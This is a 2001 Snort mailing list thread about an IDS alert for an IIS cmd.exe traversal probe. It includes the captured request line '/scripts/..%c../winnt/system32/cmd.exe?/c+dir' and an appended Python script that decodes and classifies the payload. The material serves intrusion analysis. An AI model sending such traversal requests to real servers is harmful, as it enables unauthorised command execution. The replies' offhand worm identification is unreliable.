Snort mailing list archives

RE: Cmd.exe requests


From: Anthony Geoffron <anthonyg () passinglane com>
Date: Mon, 6 Aug 2001 13:08:08 -0700

It seems to be Code Red Version 3.0.

-----Original Message-----
From: ktimm () server1 stingrey com [mailto:ktimm () server1 stingrey com]
Sent: Monday, August 06, 2001 12:48 PM
To: Tom Sevy
Cc: snort-users () lists sourceforge net
Subject: Re: [Snort-users] Cmd.exe requests


It is probably an automated Unicode-style scanner. Most check for
vulnerability by doing a dir and seeing if it returns correct error
codes.

On Mon, 6 Aug 2001, Tom Sevy wrote:

Does the following payload indicate any known worm?  Or just a cmd.exe
attempt?  I have been seeing a lot of these.





Generated by ACID v0.9.6b13 on Mon August 06, 2001 15:03:52


------------------------------------------------------------------------------
#(1 - 61331) [2001-08-03 15:55:03]  WEB-IIS cmd.exe access
IPv4: 63.202.158.22 -> 208.248.231.103
      hlen=5 TOS=0 dlen=106 ID=52091 flags=0 offset=0 TTL=241 chksum=10193
TCP:  port=33837 -> dport: 80  flags=***AP*** seq=2524555147
      ack=14124627 off=5 res=0 win=8760 urp=0 chksum=32756
Payload:  length = 62

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D   c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69   32/cmd.exe?/c+di
030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A         r HTTP/1.0....

_______________________________________________
Snort-users mailing list
Snort-users () lists sourceforge net
Go to this URL to change user options or unsubscribe:
http://lists.sourceforge.net/lists/listinfo/snort-users
Snort-users list archive:
http://www.geocrawler.com/redir-sf.php3?list=snort-users
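
Added example, not part of the original thread or of Snort/ACID: a short Python script that rebuilds the raw request from the ACID payload dump quoted above and lists the traits of the request line that tie it to the "WEB-IIS cmd.exe access" alert. The function names `dump_to_bytes` and `classify` and the wording of the findings are assumptions made for this illustration.

```python
import re

# Payload dump copied verbatim from the ACID alert in this thread.
ACID_DUMP = """\
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D   c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69   32/cmd.exe?/c+di
030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A         r HTTP/1.0....
"""

def dump_to_bytes(dump):
    """Rebuild the raw payload from 'offset : hex bytes   ascii' lines."""
    out = bytearray()
    for line in dump.splitlines():
        m = re.match(r"\s*([0-9A-Fa-f]+) : ((?:[0-9A-Fa-f]{2} ?)+)", line)
        if not m:
            continue
        if int(m.group(1), 16) != len(out):  # a dropped line would shift offsets
            raise ValueError("offset gap before line " + m.group(1))
        out += bytes.fromhex(m.group(2))
    return bytes(out)

def classify(payload):
    """List the traits of the request line that mark it as a cmd.exe probe."""
    parts = payload.split(b"\r\n", 1)[0].decode("latin-1").split(" ")
    if len(parts) < 2:
        return {"request": None, "findings": []}
    path, _, query = parts[1].partition("?")
    findings = []
    if "cmd.exe" in path.lower():
        findings.append("cmd.exe in path")
    if ".." in path:
        findings.append("dot-dot segment in path")
    # '%' must be followed by two hex digits to be a valid URL escape.
    if re.search(r"%(?![0-9A-Fa-f]{2})", path):
        findings.append("malformed percent-escape in path")
    # In a query string '+' stands for a space, so '/c+dir' is '/c dir'.
    if query:
        findings.append("command string: " + query.replace("+", " "))
    return {"request": parts[1], "findings": findings}

if __name__ == "__main__":
    raw = dump_to_bytes(ACID_DUMP)
    print(len(raw), raw)
    for finding in classify(raw)["findings"]:
        print(" -", finding)
```

The rebuilt payload is 62 bytes, matching the "Payload:  length = 62" line in the alert.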


